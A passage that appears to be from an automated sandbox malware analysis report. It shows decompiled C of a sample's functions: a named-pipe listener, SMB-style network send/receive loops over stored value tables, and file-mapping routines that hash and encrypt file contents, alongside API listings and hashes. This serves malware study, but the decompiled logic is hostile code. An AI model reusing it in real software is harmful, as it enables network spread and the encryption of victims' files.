                                                                                                                                                              									if(_t51 != 0) {
                                                                                                                                                              										_v16 = 0;
                                                                                                                                                              										if(ReadFile(_v8, _t51, _v12,  &_v16, 0) != 0 && _v16 == _v12) {
                                                                                                                                                              											_t44 = StrChrW(_t51, 0x3a);
                                                                                                                                                              											if(_t44 != 0) {
                                                                                                                                                              												 *_t44 = 0;
                                                                                                                                                              												E04E269AE(_t51,  &(_t44[1]), 2);
                                                                                                                                                              											}
                                                                                                                                                              										}
                                                                                                                                                              										HeapFree(GetProcessHeap(), 0, _t51);
                                                                                                                                                              									}
                                                                                                                                                              									L17:
                                                                                                                                                              									FlushFileBuffers(_v8);
                                                                                                                                                              									DisconnectNamedPipe(_v8); // executed
                                                                                                                                                              									goto L18;
                                                                                                                                                              								}
                                                                                                                                                              								Sleep(0x3e8); // executed
                                                                                                                                                              								L9:
                                                                                                                                                              							} while (_t50 != 0);
                                                                                                                                                              							goto L17;
                                                                                                                                                              						}
                                                                                                                                                              						L3:
                                                                                                                                                              						_t30 = CreateNamedPipeW(_a4, 3, 6, 1, 0, 0, 0,  &_v28); // executed
                                                                                                                                                              						_v8 = _t30;
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              			}














                                                                                                                                                              0x04e27012
                                                                                                                                                              0x04e27013
                                                                                                                                                              0x04e27016
                                                                                                                                                              0x04e2701b
                                                                                                                                                              0x04e27022
                                                                                                                                                              0x04e27028
                                                                                                                                                              0x04e2702e
                                                                                                                                                              0x04e27033
                                                                                                                                                              0x04e27143
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e2705f
                                                                                                                                                              0x04e2705f
                                                                                                                                                              0x04e2706f
                                                                                                                                                              0x04e27075
                                                                                                                                                              0x04e2707b
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e2707d
                                                                                                                                                              0x04e2707f
                                                                                                                                                              0x04e27087
                                                                                                                                                              0x04e2712f
                                                                                                                                                              0x04e27132
                                                                                                                                                              0x04e2705f
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e2708d
                                                                                                                                                              0x04e2708f
                                                                                                                                                              0x04e27090
                                                                                                                                                              0x04e2709b
                                                                                                                                                              0x04e2709c
                                                                                                                                                              0x04e2709f
                                                                                                                                                              0x04e270a7
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e270ac
                                                                                                                                                              0x04e270cd
                                                                                                                                                              0x04e270d1
                                                                                                                                                              0x04e270db
                                                                                                                                                              0x04e270ea
                                                                                                                                                              0x04e270f7
                                                                                                                                                              0x04e270ff
                                                                                                                                                              0x04e27103
                                                                                                                                                              0x04e2710d
                                                                                                                                                              0x04e2710d
                                                                                                                                                              0x04e270ff
                                                                                                                                                              0x04e27117
                                                                                                                                                              0x04e27117
                                                                                                                                                              0x04e2711d
                                                                                                                                                              0x04e27120
                                                                                                                                                              0x04e27129
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e27129
                                                                                                                                                              0x04e270b3
                                                                                                                                                              0x04e270b9
                                                                                                                                                              0x04e270b9
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e270bd
                                                                                                                                                              0x04e2705f
                                                                                                                                                              0x04e2706f
                                                                                                                                                              0x04e27075
                                                                                                                                                              0x04e27078
                                                                                                                                                              0x04e2705f

                                                                                                                                                              APIs
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000014), ref: 04E27025
                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 04E27028
                                                                                                                                                              • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 04E2703C
                                                                                                                                                              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,00000000,00000000), ref: 04E27051
                                                                                                                                                              • CreateNamedPipeW.KERNELBASE(?,00000003,00000006,00000001,00000000,00000000,00000000,0000000C), ref: 04E2706F
                                                                                                                                                              • ConnectNamedPipe.KERNELBASE(00000000,00000000), ref: 04E2707F
                                                                                                                                                              • PeekNamedPipe.KERNELBASE(?,00000000,00000000,00000000,?,00000000), ref: 04E2709F
                                                                                                                                                              • Sleep.KERNELBASE(000003E8), ref: 04E270B3
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?), ref: 04E270C4
                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 04E270C7
                                                                                                                                                              • ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 04E270E2
                                                                                                                                                              • StrChrW.SHLWAPI(00000000,0000003A), ref: 04E270F7
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 04E27114
                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 04E27117
                                                                                                                                                              • FlushFileBuffers.KERNEL32(?), ref: 04E27120
                                                                                                                                                              • DisconnectNamedPipe.KERNELBASE(?), ref: 04E27129
                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 04E27132
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000014.00000002.675033905.0000000004E21000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true
                                                                                                                                                              • Associated: 00000014.00000002.675021183.0000000004E20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.690048588.0000000004E2D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.700531229.0000000004E33000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.703890897.0000000004E39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_20_2_4e20000_rundll32.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Heap$NamedPipe$Process$AllocDescriptorFileSecurity$BuffersCloseConnectCreateDaclDisconnectFlushFreeHandleInitializePeekReadSleep
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1225799970-0
                                                                                                                                                              • Opcode ID: 54ee050bd1392cf2a10b9e6db8d55c2130b7da61e7bbe8b74fbc03e528a4b8d2
                                                                                                                                                              • Instruction ID: 2083649ff7f4122cf1f246ad17270f2f96b07f423fd0872289bc2e2cf41059f9
                                                                                                                                                              • Opcode Fuzzy Hash: 54ee050bd1392cf2a10b9e6db8d55c2130b7da61e7bbe8b74fbc03e528a4b8d2
                                                                                                                                                              • Instruction Fuzzy Hash: 48416D31A00228BBEB215BA2DE49EAFBF39EF45752F140514F601F6094D7759E40DAA0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 489 4e21ca3-4e21ccd GetProcessHeap HeapAlloc 490 4e21cd3-4e21ce0 GetProcessHeap HeapAlloc 489->490 491 4e21dc7-4e21dce 489->491 492 4e21ce6-4e21d2e htons send 490->492 493 4e21db5-4e21dc1 HeapFree 490->493 494 4e21d30-4e21d45 recv 492->494 495 4e21da5-4e21daf HeapFree 492->495 493->491 494->495 496 4e21d47-4e21d4a 494->496 495->493 496->495 499 4e21d4c-4e21d60 call 4e21c3a 496->499 499->495 502 4e21d62-4e21d66 499->502 503 4e21d6b 502->503 504 4e21d6d-4e21d81 call 4e21747 503->504 506 4e21d86-4e21d8b 504->506 506->495 507 4e21d8d-4e21d96 506->507 507->504 508 4e21d98-4e21da3 507->508 508->495 508->503
                                                                                                                                                              C-Code - Quality: 63%
                                                                                                                                                              			E04E21CA3(intOrPtr _a4, void** _a8, long _a12) {
                                                                                                                                                              				char _v5;
                                                                                                                                                              				signed int _v12;
                                                                                                                                                              				void* _v16;
                                                                                                                                                              				void* _t34;
                                                                                                                                                              				void* _t41;
                                                                                                                                                              				short _t42;
                                                                                                                                                              				char _t45;
                                                                                                                                                              				char _t46;
                                                                                                                                                              				void* _t47;
                                                                                                                                                              				signed int _t48;
                                                                                                                                                              				intOrPtr* _t56;
                                                                                                                                                              				void* _t58;
                                                                                                                                                              				void* _t60;
                                                                                                                                                              				void* _t61;
                                                                                                                                                              
                                                                                                                                                              				_v5 = 0;
                                                                                                                                                              				_t34 = HeapAlloc(GetProcessHeap(), 8, 0xffff);
                                                                                                                                                              				_v16 = _t34;
                                                                                                                                                              				if(_t34 != 0) {
                                                                                                                                                              					_t47 = HeapAlloc(GetProcessHeap(), 8, 0x33);
                                                                                                                                                              					if(_t47 != 0) {
                                                                                                                                                              						_t58 =  *_a8;
                                                                                                                                                              						 *((intOrPtr*)(_t58 + 4)) =  *((intOrPtr*)(_t58 + 4)) + 1;
                                                                                                                                                              						_t48 = 9;
                                                                                                                                                              						_t41 = memcpy(_t47, _t58, _t48 << 2);
                                                                                                                                                              						__imp__#9(0x2f);
                                                                                                                                                              						 *(_t47 + 2) = _t41;
                                                                                                                                                              						_t42 = 0xc;
                                                                                                                                                              						 *((char*)(_t47 + 8)) = 0x72;
                                                                                                                                                              						 *((short*)(_t47 + 0x25)) = _t42;
                                                                                                                                                              						 *((char*)(_t47 + 0x27)) = 2;
                                                                                                                                                              						asm("movsd");
                                                                                                                                                              						asm("movsd");
                                                                                                                                                              						asm("movsw");
                                                                                                                                                              						asm("movsb");
                                                                                                                                                              						__imp__#19(_a4, _t47, 0x33, 0); // executed
                                                                                                                                                              						if(_t42 > 0) {
                                                                                                                                                              							_t60 = _v16;
                                                                                                                                                              							__imp__#16(_a4, _t60, 0xffff, 0); // executed
                                                                                                                                                              							if(_t42 > 0) {
                                                                                                                                                              								_t68 =  *((intOrPtr*)(_t60 + 9));
                                                                                                                                                              								if( *((intOrPtr*)(_t60 + 9)) == 0) {
                                                                                                                                                              									_t45 = E04E21C3A(0, _t68, _a4, _a8, _a12, _t60);
                                                                                                                                                              									_v5 = _t45;
                                                                                                                                                              									if(_t45 == 0) {
                                                                                                                                                              										_v12 = _v12 & 0x00000000;
                                                                                                                                                              										_t56 = 0x4e33478;
                                                                                                                                                              										do {
                                                                                                                                                              											_t61 = 0;
                                                                                                                                                              											while(1) {
                                                                                                                                                              												_t23 = _t61 + 0x4e334f0; // 0x4e30494
                                                                                                                                                              												_t46 = E04E21747(_a4, _a8, _a12,  *_t56,  *_t23, _v16); // executed
                                                                                                                                                              												_v5 = _t46;
                                                                                                                                                              												if(_t46 != 0) {
                                                                                                                                                              													goto L11;
                                                                                                                                                              												}
                                                                                                                                                              												_t61 = _t61 + 4;
                                                                                                                                                              												if(_t61 < 0xcc) {
                                                                                                                                                              													continue;
                                                                                                                                                              												} else {
                                                                                                                                                              													goto L10;
                                                                                                                                                              												}
                                                                                                                                                              												goto L11;
                                                                                                                                                              											}
                                                                                                                                                              											goto L11;
                                                                                                                                                              											L10:
                                                                                                                                                              											_v12 = _v12 + 4;
                                                                                                                                                              											_t56 = _t56 + 4;
                                                                                                                                                              										} while (_v12 < 0x78);
                                                                                                                                                              									}
                                                                                                                                                              								}
                                                                                                                                                              							}
                                                                                                                                                              						}
                                                                                                                                                              						L11:
                                                                                                                                                              						HeapFree(GetProcessHeap(), 8, _t47);
                                                                                                                                                              					}
                                                                                                                                                              					HeapFree(GetProcessHeap(), 8, _v16);
                                                                                                                                                              				}
                                                                                                                                                              				return _v5;
                                                                                                                                                              			}

















                                                                                                                                                              0x04e21cb9
                                                                                                                                                              0x04e21cc6
                                                                                                                                                              0x04e21cc8
                                                                                                                                                              0x04e21ccd
                                                                                                                                                              0x04e21cdc
                                                                                                                                                              0x04e21ce0
                                                                                                                                                              0x04e21ce9
                                                                                                                                                              0x04e21ceb
                                                                                                                                                              0x04e21cf0
                                                                                                                                                              0x04e21cf5
                                                                                                                                                              0x04e21cf7
                                                                                                                                                              0x04e21cff
                                                                                                                                                              0x04e21d03
                                                                                                                                                              0x04e21d04
                                                                                                                                                              0x04e21d08
                                                                                                                                                              0x04e21d0c
                                                                                                                                                              0x04e21d18
                                                                                                                                                              0x04e21d19
                                                                                                                                                              0x04e21d1a
                                                                                                                                                              0x04e21d1c
                                                                                                                                                              0x04e21d26
                                                                                                                                                              0x04e21d2e
                                                                                                                                                              0x04e21d30
                                                                                                                                                              0x04e21d3d
                                                                                                                                                              0x04e21d45
                                                                                                                                                              0x04e21d47
                                                                                                                                                              0x04e21d4a
                                                                                                                                                              0x04e21d56
                                                                                                                                                              0x04e21d5b
                                                                                                                                                              0x04e21d60
                                                                                                                                                              0x04e21d62
                                                                                                                                                              0x04e21d66
                                                                                                                                                              0x04e21d6b
                                                                                                                                                              0x04e21d6b
                                                                                                                                                              0x04e21d6d
                                                                                                                                                              0x04e21d70
                                                                                                                                                              0x04e21d81
                                                                                                                                                              0x04e21d86
                                                                                                                                                              0x04e21d8b
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e21d8d
                                                                                                                                                              0x04e21d96
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e21d96
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e21d98
                                                                                                                                                              0x04e21d98
                                                                                                                                                              0x04e21d9c
                                                                                                                                                              0x04e21d9f
                                                                                                                                                              0x04e21d6b
                                                                                                                                                              0x04e21d60
                                                                                                                                                              0x04e21d4a
                                                                                                                                                              0x04e21d45
                                                                                                                                                              0x04e21da5
                                                                                                                                                              0x04e21daf
                                                                                                                                                              0x04e21daf
                                                                                                                                                              0x04e21dc1
                                                                                                                                                              0x04e21dc1
                                                                                                                                                              0x04e21dce

                                                                                                                                                              APIs
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,0000FFFF,?,00000000,00000000,04E25414,00000000,?,0BADF00D,?,?,?,?,04E2943A,?), ref: 04E21CBD
                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,04E2943A,?), ref: 04E21CC6
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000033,?,?,?,?,04E2943A,?), ref: 04E21CD7
                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,04E2943A,?), ref: 04E21CDA
                                                                                                                                                              • htons.WS2_32(0000002F), ref: 04E21CF7
                                                                                                                                                              • send.WS2_32(00000033,00000000,00000033,00000000), ref: 04E21D26
                                                                                                                                                              • recv.WS2_32(0000FFFF,?,0000FFFF,00000000), ref: 04E21D3D
                                                                                                                                                                • Part of subcall function 04E21747: GetProcessHeap.KERNEL32(00000008,?,00000000,?,00000000,04E21C7A,00000000,?,00000000,00000000,?,?,00000003,00000000,?,00000000), ref: 04E21783
                                                                                                                                                                • Part of subcall function 04E21747: HeapAlloc.KERNEL32(00000000), ref: 04E2178C
                                                                                                                                                                • Part of subcall function 04E21747: CharUpperW.USER32(00000000), ref: 04E217B2
                                                                                                                                                                • Part of subcall function 04E21747: GetProcessHeap.KERNEL32(00000008,00000086), ref: 04E217DA
                                                                                                                                                                • Part of subcall function 04E21747: HeapAlloc.KERNEL32(00000000), ref: 04E217DD
                                                                                                                                                                • Part of subcall function 04E21747: htons.WS2_32(00000082), ref: 04E21801
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,?,04E2943A,?), ref: 04E21DA8
                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,?,?,04E2943A,?), ref: 04E21DAF
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,04E2943A,?), ref: 04E21DBA
                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,?,?,04E2943A,?), ref: 04E21DC1
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000014.00000002.675033905.0000000004E21000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true
                                                                                                                                                              • Associated: 00000014.00000002.675021183.0000000004E20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.690048588.0000000004E2D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.700531229.0000000004E33000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.703890897.0000000004E39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_20_2_4e20000_rundll32.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Heap$Process$Alloc$Freehtons$CharUpperrecvsend
                                                                                                                                                              • String ID: Oet Uet0Xet$NT LM 0.12$x
                                                                                                                                                              • API String ID: 2343870972-2604580913
                                                                                                                                                              • Opcode ID: 4c78ff89ec8c3004bf187f150d581f3c4c1fc66d94337ea18cdde6785db92c71
                                                                                                                                                              • Instruction ID: 64938279eb6f33915099685f0575846c80f24c459f54e5bfff712a1c08f4a9d9
                                                                                                                                                              • Opcode Fuzzy Hash: 4c78ff89ec8c3004bf187f150d581f3c4c1fc66d94337ea18cdde6785db92c71
                                                                                                                                                              • Instruction Fuzzy Hash: 2031DD32900215FBEF228FE5DD48FAABF75EF85356F148054FA08AB191C676AA05CB50
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 40%
                                                                                                                                                              			E04E25BC4(void* __eflags, void* _a4, intOrPtr _a8, intOrPtr _a16) {
                                                                                                                                                              				void* _v8;
                                                                                                                                                              				int _v12;
                                                                                                                                                              				void* _v16;
                                                                                                                                                              				int _v20;
                                                                                                                                                              				struct _SYSTEM_INFO _v56;
                                                                                                                                                              				void* _t43;
                                                                                                                                                              				long _t45;
                                                                                                                                                              				void* _t46;
                                                                                                                                                              				intOrPtr _t49;
                                                                                                                                                              				long _t52;
                                                                                                                                                              				void* _t53;
                                                                                                                                                              				long _t62;
                                                                                                                                                              				signed int _t63;
                                                                                                                                                              				intOrPtr _t76;
                                                                                                                                                              				void* _t77;
                                                                                                                                                              				void* _t80;
                                                                                                                                                              				void* _t81;
                                                                                                                                                              				void* _t82;
                                                                                                                                                              
                                                                                                                                                              				_t63 = 8;
                                                                                                                                                              				_v56.dwOemId = 0;
                                                                                                                                                              				memset( &(_v56.dwPageSize), 0, _t63 << 2);
                                                                                                                                                              				_v20 = 0;
                                                                                                                                                              				GetSystemInfo( &_v56); // executed
                                                                                                                                                              				_t7 = _a16 + 0x44; // 0x15ff4877
                                                                                                                                                              				_t80 =  *_t7 + 0x16;
                                                                                                                                                              				_t76 = _a8 - _t80;
                                                                                                                                                              				asm("sbb [ebp+0x10], ebx");
                                                                                                                                                              				asm("adc edx, [ebp+0x10]");
                                                                                                                                                              				asm("sbb edx, eax");
                                                                                                                                                              				_a8 = _t76;
                                                                                                                                                              				_t43 = E04E2A6B0(_v56.dwAllocationGranularity + _t76 - 1, 0, _v56.dwAllocationGranularity, 0);
                                                                                                                                                              				asm("sbb edx, 0x0");
                                                                                                                                                              				_t45 = E04E2A670(_t43 - 1, 0, _v56.dwAllocationGranularity, 0);
                                                                                                                                                              				_t77 = _t76 - _t45;
                                                                                                                                                              				_t62 = _t77 + _t80;
                                                                                                                                                              				_t46 = MapViewOfFile(_a4, 6, 0, _t45, _t62); // executed
                                                                                                                                                              				_t81 = _t46;
                                                                                                                                                              				_v8 = _t81;
                                                                                                                                                              				if(_t81 != 0) {
                                                                                                                                                              					_a4 = 0;
                                                                                                                                                              					_t49 = _a16;
                                                                                                                                                              					_t17 = _t49 + 0x40; // 0xff0975e4
                                                                                                                                                              					__imp__CryptDuplicateHash( *_t17, 0, 0,  &_a4);
                                                                                                                                                              					if(_t49 != 0) {
                                                                                                                                                              						_t82 = _t81 + _t77;
                                                                                                                                                              						__imp__CryptHashData(_a4, _t82, 4, 0);
                                                                                                                                                              						if(_t49 != 0) {
                                                                                                                                                              							_t20 = _a16 + 0x44; // 0x15ff4877
                                                                                                                                                              							_t52 =  *_t20;
                                                                                                                                                              							_v12 = _t52;
                                                                                                                                                              							_t53 = LocalAlloc(0x40, _t52);
                                                                                                                                                              							_v16 = _t53;
                                                                                                                                                              							if(_t53 != 0) {
                                                                                                                                                              								__imp__CryptGetHashParam(_a4, 2, _t53,  &_v12, 0);
                                                                                                                                                              								if(_t53 != 0) {
                                                                                                                                                              									memcpy(_t82 + 4, _v16, _v12);
                                                                                                                                                              									asm("movsd");
                                                                                                                                                              									asm("movsd");
                                                                                                                                                              									asm("movsd");
                                                                                                                                                              									asm("movsd");
                                                                                                                                                              									asm("movsw");
                                                                                                                                                              									_v20 = FlushViewOfFile(_v8, _t62);
                                                                                                                                                              								}
                                                                                                                                                              								LocalFree(_v16);
                                                                                                                                                              							}
                                                                                                                                                              						}
                                                                                                                                                              						__imp__CryptDestroyHash(_a4);
                                                                                                                                                              					}
                                                                                                                                                              					UnmapViewOfFile(_v8);
                                                                                                                                                              				}
                                                                                                                                                              				return _v20;
                                                                                                                                                              			}





















                                                                                                                                                              0x04e25bd1
                                                                                                                                                              0x04e25bd4
                                                                                                                                                              0x04e25bda
                                                                                                                                                              0x04e25be0
                                                                                                                                                              0x04e25be3
                                                                                                                                                              0x04e25bec
                                                                                                                                                              0x04e25bf2
                                                                                                                                                              0x04e25bf5
                                                                                                                                                              0x04e25bf7
                                                                                                                                                              0x04e25c05
                                                                                                                                                              0x04e25c0d
                                                                                                                                                              0x04e25c11
                                                                                                                                                              0x04e25c14
                                                                                                                                                              0x04e25c1e
                                                                                                                                                              0x04e25c27
                                                                                                                                                              0x04e25c2c
                                                                                                                                                              0x04e25c2e
                                                                                                                                                              0x04e25c39
                                                                                                                                                              0x04e25c3f
                                                                                                                                                              0x04e25c43
                                                                                                                                                              0x04e25c48
                                                                                                                                                              0x04e25c54
                                                                                                                                                              0x04e25c57
                                                                                                                                                              0x04e25c5a
                                                                                                                                                              0x04e25c5d
                                                                                                                                                              0x04e25c65
                                                                                                                                                              0x04e25c6f
                                                                                                                                                              0x04e25c75
                                                                                                                                                              0x04e25c7d
                                                                                                                                                              0x04e25c82
                                                                                                                                                              0x04e25c82
                                                                                                                                                              0x04e25c88
                                                                                                                                                              0x04e25c8b
                                                                                                                                                              0x04e25c91
                                                                                                                                                              0x04e25c96
                                                                                                                                                              0x04e25ca4
                                                                                                                                                              0x04e25cac
                                                                                                                                                              0x04e25cb8
                                                                                                                                                              0x04e25ccf
                                                                                                                                                              0x04e25cd0
                                                                                                                                                              0x04e25cd1
                                                                                                                                                              0x04e25cd5
                                                                                                                                                              0x04e25cda
                                                                                                                                                              0x04e25ce2
                                                                                                                                                              0x04e25ce2
                                                                                                                                                              0x04e25ce8
                                                                                                                                                              0x04e25ce8
                                                                                                                                                              0x04e25c96
                                                                                                                                                              0x04e25cf1
                                                                                                                                                              0x04e25cf1
                                                                                                                                                              0x04e25cfa
                                                                                                                                                              0x04e25cfa
                                                                                                                                                              0x04e25d07

                                                                                                                                                              APIs
                                                                                                                                                              • GetSystemInfo.KERNELBASE(?,00000000,?,00000000,?,?,?,?,?,?,?,?,04E25E4C,?,?,00000000), ref: 04E25BE3
                                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04E25C14
                                                                                                                                                              • MapViewOfFile.KERNELBASE(00000000,00000006,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 04E25C39
                                                                                                                                                              • CryptDuplicateHash.ADVAPI32(FF0975E4,00000000,00000000,00000000,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 04E25C5D
                                                                                                                                                              • CryptHashData.ADVAPI32(00000000,00000000,00000004,00000000,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 04E25C75
                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,15FF4877,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 04E25C8B
                                                                                                                                                              • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 04E25CA4
                                                                                                                                                              • memcpy.MSVCRT ref: 04E25CB8
                                                                                                                                                              • FlushViewOfFile.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,?,04E25E4C,?,?), ref: 04E25CDC
                                                                                                                                                              • LocalFree.KERNEL32(?,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 04E25CE8
                                                                                                                                                              • CryptDestroyHash.ADVAPI32(00000000,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 04E25CF1
                                                                                                                                                              • UnmapViewOfFile.KERNEL32(?,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 04E25CFA
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000014.00000002.675033905.0000000004E21000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true
                                                                                                                                                              • Associated: 00000014.00000002.675021183.0000000004E20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.690048588.0000000004E2D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.700531229.0000000004E33000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.703890897.0000000004E39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_20_2_4e20000_rundll32.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CryptHash$FileView$Local$AllocDataDestroyDuplicateFlushFreeInfoParamSystemUnmapUnothrow_t@std@@@__ehfuncinfo$??2@memcpy
                                                                                                                                                              • String ID: encrypted
                                                                                                                                                              • API String ID: 3326259677-1467498611
                                                                                                                                                              • Opcode ID: 446d21cac4fdfe283dce78ec18a845cf057f54aae47902d02ee17bf2322f1f67
                                                                                                                                                              • Instruction ID: 23dd8a6773e88c55945dd379a323ea9b36f13a6ad22d5dca6dbf58a1f0fe9ea4
                                                                                                                                                              • Opcode Fuzzy Hash: 446d21cac4fdfe283dce78ec18a845cf057f54aae47902d02ee17bf2322f1f67
                                                                                                                                                              • Instruction Fuzzy Hash: 5E413AB1A00119BFEB10DF65DE49EAE7BB9FF44345F014164FA05E6250EB32EE148BA0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 69%
                                                                                                                                                              			E04E25D0A(void* __edx, long _a4, intOrPtr _a8) {
                                                                                                                                                              				void* _v8;
                                                                                                                                                              				void* _v12;
                                                                                                                                                              				long _v16;
                                                                                                                                                              				char _v20;
                                                                                                                                                              				long _v24;
                                                                                                                                                              				void* _v28;
                                                                                                                                                              				char _v32;
                                                                                                                                                              				signed int _v36;
                                                                                                                                                              				intOrPtr _v40;
                                                                                                                                                              				signed int _v44;
                                                                                                                                                              				int _t52;
                                                                                                                                                              				void* _t53;
                                                                                                                                                              				struct _SECURITY_ATTRIBUTES* _t56;
                                                                                                                                                              				void* _t57;
                                                                                                                                                              				void* _t59;
                                                                                                                                                              				void* _t63;
                                                                                                                                                              				void* _t67;
                                                                                                                                                              				signed int _t69;
                                                                                                                                                              				void* _t70;
                                                                                                                                                              				intOrPtr _t80;
                                                                                                                                                              				long _t82;
                                                                                                                                                              				intOrPtr _t89;
                                                                                                                                                              
                                                                                                                                                              				_t80 = _a8;
                                                                                                                                                              				_t82 = 0;
                                                                                                                                                              				_t52 =  &_v16;
                                                                                                                                                              				_v20 = 0;
                                                                                                                                                              				_v32 = 0;
                                                                                                                                                              				_v16 = 0;
                                                                                                                                                              				__imp__CryptDuplicateKey( *((intOrPtr*)(_t80 + 0x3c)), 0, 0, _t52);
                                                                                                                                                              				if(_t52 == 0) {
                                                                                                                                                              					L21:
                                                                                                                                                              					return _t52;
                                                                                                                                                              				}
                                                                                                                                                              				_t53 = CreateFileW(_a4, 0xc0000000, 0, 0, 3, 0, 0); // executed
                                                                                                                                                              				_v12 = _t53;
                                                                                                                                                              				if(_t53 == 0xffffffff) {
                                                                                                                                                              					L18:
                                                                                                                                                              					_t52 = CryptDestroyKey(_v16);
                                                                                                                                                              					if(_v20 == _t82 || _v32 != _t82) {
                                                                                                                                                              						goto L21;
                                                                                                                                                              					} else {
                                                                                                                                                              						return SetEvent( *(_t80 + 0x48));
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				_v24 = 0;
                                                                                                                                                              				__imp__GetFileSizeEx(_t53,  &_v44);
                                                                                                                                                              				_t73 = _v40;
                                                                                                                                                              				_t69 = _v44;
                                                                                                                                                              				_a4 = 0x1000000;
                                                                                                                                                              				_t89 = _v40;
                                                                                                                                                              				if(_t89 <= 0 && (_t89 < 0 || _t69 < 0x1000000)) {
                                                                                                                                                              					_v24 = 1;
                                                                                                                                                              					_a4 = _t69;
                                                                                                                                                              					_t67 = E04E2A6B0(_t69, _t73, 0x10, _t82);
                                                                                                                                                              					asm("adc edx, esi");
                                                                                                                                                              					_t69 = _t67 + 1 << 4;
                                                                                                                                                              				}
                                                                                                                                                              				_t56 = 0;
                                                                                                                                                              				asm("adc edi, ecx");
                                                                                                                                                              				_t85 =  *((intOrPtr*)(_t80 + 0x44)) + _t69 + 0x12;
                                                                                                                                                              				asm("adc edi, eax");
                                                                                                                                                              				_t57 = CreateFileMappingW(_v12, _t56, 4, 0,  *((intOrPtr*)(_t80 + 0x44)) + _t69 + 0x12, _t56); // executed
                                                                                                                                                              				_v8 = _t57;
